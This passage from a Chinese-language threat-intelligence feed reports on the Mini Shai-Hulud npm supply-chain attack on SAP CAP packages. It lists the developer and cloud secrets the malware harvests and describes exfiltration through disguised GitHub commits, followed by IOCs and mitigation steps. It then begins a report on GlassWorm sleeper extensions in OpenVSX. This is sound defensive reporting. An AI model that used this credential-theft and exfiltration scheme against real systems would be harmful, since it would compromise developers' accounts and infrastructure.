3px 5px;border-radius: 4px;"><span leaf="">gh auth token</span></code><span leaf="">）</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• npm token（</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">~/.npmrc</span></code><span leaf="">）</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• AWS（STS、Secrets Manager、SSM）</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• Azure（订阅、Key Vault）</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• GCP（项目身份、Secret Manager）</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• Kubernetes service account token</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 本地工具配置（Claude AI、MCP、Signal、Electrum、VPN 等）</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• GitHub Actions runner 上通过嵌入式 Python 内存 dump 提取 secrets</span></p></li></ul></ul><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">数据外传</span></span></strong><span leaf="">：使用 AES-256-GCM + RSA 加密，通过 </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">GitHub 死投（commit messages / public repos）</span></span></strong><span leaf=""> 外传（伪装成 “chore: update dependencies” 提交，作者显示为 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">claude@users.noreply.github.com</span></code><span leaf="">）。</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">自传播</span></span></strong><span leaf="">：修改 package tarballs、注入 GitHub workflows，关键词 “OhNoWhatsGoingOnWithGitHub” 和 “A Mini Shai-Hulud has Appeared”。</span></p></li></ul></ul><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">关键 IOCs（Aikido 提供）</span></span></strong><span leaf="">：</span></p><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 文件：</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">setup.mjs</span></code><span leaf="">（SHA256: </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">4066781fa830224c8bbcc3aa005a396657f9c8f9016f9a64ad44a9d7f5f45e34</span></code><span leaf="">）</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 文件：</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">execution.js</span></code><span leaf="">（SHA256: </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">6f933d00b7d05678eb43c90963a80b8947c4ae6830182f89df31da9f568fea95</span></code><span leaf="">）</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 字符串：</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">A Mini Shai-Hulud has Appeared</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">OhNoWhatsGoingOnWithGitHub</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">ctf-scramble-v2</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">tmp.987654321.lock</span></code></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• GitHub 搜索关键词：</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">OhNoWhatsGoingOnWithGitHub</span></code><span leaf="">（commits）或仓库描述含 “A Mini Shai-Hulud has Appeared”</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• Bun 下载域名：</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">github.com/oven-sh/bun/releases/download/bun-v1.3.13/</span></code></p></li></ul><p><code></code></p><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgb(55, 113, 187);margin: 2em 8px 0.75em 0px;color: rgb(63, 63, 63);font-size: 17.6px;font-weight: bold;line-height: 1.2;"><strong><span leaf=""><span textstyle="" style="color: rgb(55, 113, 187);">威胁归因及与 Shai-Hulud 的关联</span></span></strong></h3><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">Aikido 将其明确归类为 </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">Mini Shai-Hulud</span></span></strong><span leaf="">，与 2025 年 Shai-Hulud V1（chalk/debug 等 18 个包）和 V2（自传播蠕虫）手法高度一致（install-time 执行 + 凭证窃取 + GitHub 传播）。本次规模更小（仅 4 个包），但 payload 更成熟、专业化，针对企业开发者/CI 环境优化。暂无公开威胁演员归因，但手法与此前 Axios、TeamPCP 等北韩相关活动有相似性。</span></p><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgba(55, 113, 187, 1);margin: 2em 8px 0.75em 0;color: #3f3f3f;font-size: 17.6px;font-weight: bold;line-height: 1.2;"><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-align: left;color: rgb(63, 63, 63);font-size: 17.6px;font-weight: bold;line-height: 1.2;"><span leaf=""><span textstyle="" style="color: rgb(55, 113, 187);">立即缓解与检测建议（优先级最高</span></span></strong><strong style="color: rgba(55, 113, 187, 1);font-weight: bold;font-size: inherit;"><span leaf="">）</span></strong></h3><ol style="padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display:block;margin:0.2em 8px;color:#000000;"><p><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">1. </span></span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">审计</span></span></strong><span leaf=""><span textstyle="" style="color: rgb(0, 0, 0);">：</span></span></p></li><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">npm ls mbt @cap-js/sqlite @cap-js/postgres @cap-js/db-service</span></code></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 搜索项目中 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">setup.mjs</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">execution.js</span></code><span leaf="">、</span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">preinstall</span></code><span leaf=""> 脚本</span></p></li></ul><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">2. </span></span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">清理</span></span></strong><span leaf="">：</span></p></li><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 删除 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">node_modules</span></code><span leaf=""> + lockfile → </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">npm ci --ignore-scripts</span></code><span leaf=""> 或切换 pnpm</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 检查 4月29日构建日志（Bun 下载、PowerShell 执行）</span></p></li></ul><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">3. </span></span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">响应</span></span></strong><span leaf="">：</span></p></li><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• </span><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">立即轮换</span></span></strong><span leaf="">所有 GitHub、npm、云凭证、Kubernetes token</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• GitHub 搜索上述关键词，检查可疑 commits / repos</span></p></li></ul></ol><p><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">    4. </span></span><strong><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">长期防护</span></span></strong><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(55, 113, 187);font-weight: bold;font-size: inherit;"><span textstyle="" style="color: rgb(62, 62, 62);">：</span></span></p><ol style="padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><ul style="list-style: circle;padding-left: 1em;margin-left: 0;color: #3f3f3f;" class="list-paddingleft-1"><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 使用 Aikido Safe Chain / Socket.dev / StepSecurity 等 SCA 工具</span></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• CI 中强制 </span><code style="font-size: 90%;color: #d14;background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;"><span leaf="">--ignore-scripts</span></code></p></li><li style="display: block;margin: 0.2em 8px;color: #3f3f3f;"><p><span leaf="">• 监控 SAP Security Patch Day + npm unpublish 公告</span></p></li></ul></ol><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;line-height: 1.75;text-align: left;letter-spacing: 0.1em;color: rgb(63, 63, 63);"><span leaf="">Aikido 评估</span></strong><span leaf="">：虽然包数量少，但因目标是 SAP 开发者/CI 环境，“潜在影响极高”。</span></p><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">此事件再次证明 npm 供应链攻击已成为常态，尤其针对企业框架如 SAP CAP。Socket 负责快速警报，Aikido 提供了目前最完整的 payload 逆向和 IOC 列表。</span></p><h3 data-heading="true" style="padding-left: 8px;border-left: 3px solid rgb(55, 113, 187);margin: 2em 8px 0.75em 0px;color: rgb(63, 63, 63);font-size: 17.6px;font-weight: bold;line-height: 1.2;"><strong style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-align: left;color: rgb(63, 63, 63);font-size: 17.6px;font-weight: bold;line-height: 1.2;"><span leaf="" style="font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;text-align: left;color: rgb(63, 63, 63);font-size: 17.6px;font-weight: bold;line-height: 1.2;"><span textstyle="" style="color: rgb(55, 113, 187);">参考链接</span></span></strong></h3><p style="margin: 1.5em 8px;letter-spacing: 0.1em;color: #3f3f3f;"><span leaf="">[1].<a href="https://www.aikido.dev/blog/mini-shai-hulud-has-appeared" target="_blank">https://www.aikido.dev/blog/mini-shai-hulud-has-appeared</a></span><span leaf=""><br/></span><span leaf="">[2].<a href="https://x.com/SocketSecurity/status/2049479949644374507" target="_blank">https://x.com/SocketSecurity/status/2049479949644374507</a></span></p></div><div style="font-size: 15px;letter-spacing: 1px;line-height: 1.75;padding-left: 0px;padding-right: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="  will-change: transform;box-sizing: border-box; "><div style=" margin: 10px 0%;text-align: left;justify-content: flex-start;display: flex;flex-flow: row; box-sizing: border-box; "><div style="display: inline-block;vertical-align: middle;width: 40%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style=" text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0; box-sizing: border-box; "><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" data-imgfileid="100034918" data-ratio="0.5" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="gif" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=b2dec01a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FodcL3w4qOq9yWObL9W5ibgeHZBd0e5Y1Ex1c5ULAWdhLUaHOsdMavA730h9c4R00iaLXlo9ibNaJia74PbibsRJ9u4CyoVeqCRVYqEicCL5BKicM0Q%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div><div style="display: inline-block;vertical-align: middle;width: 60%;align-self: center;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: right;font-size: 14px;box-sizing: border-box;"><p style="margin: 0px 0px 5px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><span style="color: rgb(55, 113, 187);box-sizing: border-box;"><span leaf="">阅读原文</span></span><span style="box-sizing: border-box;"><span leaf="">至</span><strong style="box-sizing: border-box;"><span leaf="">ALPHA 9.3</span></strong></span></p><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">即刻助力威胁研判</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://ti.qianxin.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a42e66f7&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI2MDc2MDA4OA%3D%3D%26mid%3D2247518567%26idx%3D1%26sn%3De3b68204c27e714e7179801b1e91c9e3">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 29 Apr 2026 22:40:00 +0800</pubDate>
    </item>
    <item>
      <title>良性首发-信任积累-更新投毒：GlassWorm 恶意软件通过 73 个 OpenVSX &#34;沉睡者&#34;扩展卷土重来</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&amp;mid=2247518560&amp;idx=1&amp;sn=36e375fceb1ea472bc6b4261b0d889fb</link>
      <description>GlassWorm 威胁活动近期在 OpenVSX 开源扩展生态中爆发新一轮大规模供应链攻击。根据 Socket 安全团队及多方情报交叉验证，攻击者于 2026 年 4 月向 OpenVSX 注册中心提交了 73 个&#34;休眠（Sleeper）&#34;恶意扩展，紧随 3 月份 72 个恶意包的第二波攻势。</description>
      <content:encoded><![CDATA[<p>原创 <span>威胁情报中心</span> <span>2026-04-28 11:37</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=e70d324c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicics0rDQHDb4DH4wwVI7RaPjbZn9OdHqWW9x7KzgVQ1bzuX8fIwUVJpE7qbwPNp20M4icSsKQtQ0iaybdl1qhcZylupznoh4xo18%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>GlassWorm 威胁活动近期在 OpenVSX 开源扩展生态中爆发新一轮大规模供应链攻击。根据 Socket 安全团队及多方情报交叉验证，攻击者于 2026 年 4 月向 OpenVSX 注册中心提交了 73 个"休眠（Sleeper）"恶意扩展，紧随 3 月份 72 个恶意包的第二波攻势。</p>
  <h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-pm-slice="0 0 []"><span leaf="">一、事件概述</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">GlassWorm 威胁活动近期在 OpenVSX 开源扩展生态中爆发新一轮大规模供应链攻击。根据 Socket 安全团队及多方情报交叉验证，攻击者于 2026 年 4 月向 OpenVSX 注册中心提交了 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">73 个&#34;休眠（Sleeper）&#34;恶意扩展</span></strong><span leaf="">，紧随 3 月份 72 个恶意包的第二波攻势。其中至少 6 个扩展已被激活并成功投递恶意载荷，其余处于潜伏状态等待后续更新触发。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">本次攻击标志着 GlassWorm 战术体系的重大演进：攻击者彻底放弃早期直接在扩展源码中硬编码恶意代码或滥用不可见 Unicode 字符的粗糙手法，转而采用 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">&#34;良性首发-信任积累-更新投毒&#34;</span></strong><span leaf=""> 的生命周期模型。恶意扩展仅作为&#34;瘦加载器（Thin Loader）&#34;，通过运行时从 GitHub 拉取辅助 VSIX 包、加载平台原生 </span><code style="overflow-wrap: break-word;font-size: 14.4px;color: rgb(221, 17, 68);background: rgba(27, 31, 35, 0.05);padding: 3px 5px;border-radius: 4px;word-break: break-all;white-space: pre-wrap;max-width: 100%;"><span leaf="">.node</span></code><span leaf=""> 模块或执行高度混淆的解密脚本，动态获取核心窃密组件。攻击目标明确指向开发者工作站，旨在批量窃取加密货币钱包、云凭证、访问令牌及 SSH 私钥。鉴于供应链攻击的穿透性与开发者环境的高权限属性，该事件威胁等级评定为 </span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">High</span></strong><span leaf="">。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 